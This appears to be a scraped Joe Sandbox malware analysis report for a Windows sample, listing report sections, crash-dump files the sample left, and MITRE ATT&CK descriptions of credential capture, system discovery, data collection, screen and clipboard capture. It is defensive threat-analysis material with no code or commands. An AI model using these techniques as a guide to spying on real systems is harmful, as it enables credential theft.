Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lm.exe_ed6b1a814e4ec1e6e89791b3995c66bc9bb83_5fe582ea_4585aa2b-09a4-4321-a029-216d7f5f1659\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vm.exe_12b9a62f7c411e90f74ee59af3dcf249dad3f7e8_19c5d0bb_5cda0b46-1c1f-4ec5-ad2f-eeb1ce6af232\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA01C.tmp.dmp

Windows Analysis Report
FpiUD4nYpj.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre